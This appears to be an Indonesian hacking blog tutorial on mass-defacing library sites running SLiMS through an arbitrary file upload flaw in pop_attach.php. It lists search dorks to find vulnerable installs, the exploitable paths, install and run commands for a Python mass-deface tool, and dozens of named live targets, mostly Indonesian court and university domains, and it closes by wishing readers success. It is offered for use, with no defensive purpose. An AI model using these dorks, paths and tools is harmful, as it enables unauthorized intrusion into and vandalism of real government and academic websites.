Assalamualaikum Brother
Oke Bro Kali Ini Gwe Alan Kasih Cara Deface Poc Slims CMS Senayan Arbitrary File Upload (Mass Remote Path) deface ini sangat mudah Dan bisa dijalankan melalui terminal kamu seperti termux,Linux,cmd dll...
Oke Langsung Saja Ke caranya...
Bahan-Bahan :
# Hp/Pc
# Internet
# Otak
# Sabar
# Dork
# Terminal
# Exploit
# Sc Deface
Dork All 15+ :
# inurl:''index.php?p=show_detail&id='' site:id
# inurl:''/slims5-meranti/'' site:id
# intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
# Powered by SLiMS site:id
# Powered by SLiMS | Design by Indra Sutriadi Pipii
# Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan.
# Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.
# SLiMS (Senayan Library Management System) is an open source Library Management System.
It is build on Open source technology like PHP and MySQL.
# PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
# This software and this template are released Under GNU GPL License Version 3
# inurl:''/index.php?select_lang='' site:sch.id
# Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog
# Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.
# O.P.A.C. (On-line Public Access Catalogue)
# inurl:''/perpustakaan/repository/'' site:id
# Senayan | Open Source Library Management System :: OPAC
Kamu pilih aja dork yang kamu mau...
Xploit : (Untuk Xploitnya Saya Kasih Banyak Disini Kamu Bisa Coba Yang Vuln Untuk Web Target Kamu)
admin/modules/bibliography/pop_attach.php
ghmclib/admin/modules/bibliography/pop_attach.php
admin/modules/bibliography/pop_attach.php?biblioID=0
katalog//admin/modules/bibliography/pop_attach.php
Berubung Gwe baik hehe maka aku kasih live target hehe..
Live Target :
Jika kamu sudah kasih exploit lalu berubah seperti ini itu tandanya vuln.. Langsung Saja salin URL nya :V
Oke langsung saja disini kita pakai tools buatan odiq & temanku alqiyaramdana , bisa di pakai di termux/linux/cmd
Install Tools :
pkg update && pkg upgrade
pkg install python2
pkg install pip2
pip2 install colorama
pip2 install bs4
pip2 install requests
pkg install git
cd slimass
Kalau udah selesai semua tinggal buat file deface txt kamu..
Ketik nano file defacemu.txt
nano iyo.txt (punya ./W4D3R)
Isi file defacemu seperti ini (contoh)
Nah jika sudah kamu ketik aja control + x lalu y jika sudah kamu ketik lagi
python2 slim.py iyo.txt (nama file kamu)
lalu enter
Nah kamu masukin URL target yang vuln tadi lalu enter..
Nah dah kedeface
Hasil Depes :
Poc? Slims CMS
Live Target Borr :
http://www.pn-kebumen.go.id
http://sipp.pn-kebumen.go.id
http://perpustakaan.pn-kebumen.go.id
http://tilang.pn-kebumen.go.id
http://jurnal.alazhar-university.ac.id
http://feeder.stikeshamzar.ac.id
http://www.stiebbank.ac.id
http://ecampus.stiebbank.ac.id
http://edu.stiebbank.ac.id
http://sacti.stiebbank.ac.id
http://ebbank.stiebbank.ac.id
http://pmb.stiebbank.ac.id
http://www.poltekkesbanten.ac.id
http://sipenmaru.poltekkesbanten.ac.id
http://perpustakaan.poltekkesbanten.ac.id
http://tlm.poltekkesbanten.ac.id
http://kebidanan.poltekkesbanten.ac.id
http://pmdp.poltekkesbanten.ac.id
http://jurnal.poltekkesbanten.ac.id
http://www.pa-muarabungo.go.id
http://pustaka.pa-muarabungo.go.id
http://perkara.pa-muarabungo.go.id
http://sipp.pa-muarabungo.go.id
http://siakad.stikmuhptk.ac.id
http://www.pn-lhokseumawe.go.id
http://eskum.pn-lhokseumawe.go.id
http://arsip.pn-lhokseumawe.go.id
http://ayahcut.pn-lhokseumawe.go.id
http://websipp.pn-lhokseumawe.go.id
http://absen.pn-lhokseumawe.go.id
http://sipk.pn-lhokseumawe.go.id
http://siapbang.pn-lhokseumawe.go.id
http://pustaka.pn-lhokseumawe.go.id
http://jdih.pn-lhokseumawe.go.id
http://awasbang.pn-lhokseumawe.go.id
http://sikm.pn-lhokseumawe.go.id
http://survey.pn-lhokseumawe.go.id
http://sipak.pn-lhokseumawe.go.id
http://www.stiebbank.ac.id
http://ecampus.stiebbank.ac.id
http://edu.stiebbank.ac.id
http://sacti.stiebbank.ac.id
http://ebbank.stiebbank.ac.id
http://pmb.stiebbank.ac.id
http://taxcenter.stiebbank.ac.id
http://alumni.stiebbank.ac.id
http://kelaskaryawan.stiebbank.ac.id
http://lomba.stiebbank.ac.id
http://perpustakaan.stiebbank.ac.id
http://kampus.stiebbank.ac.id
http://penting.stiebbank.ac.id
http://sungkono.stiebbank.ac.id
Selamat mencoba semoga berhasil
Support By : http://www.sukabumiblackhat.my.id
Trimaksih :v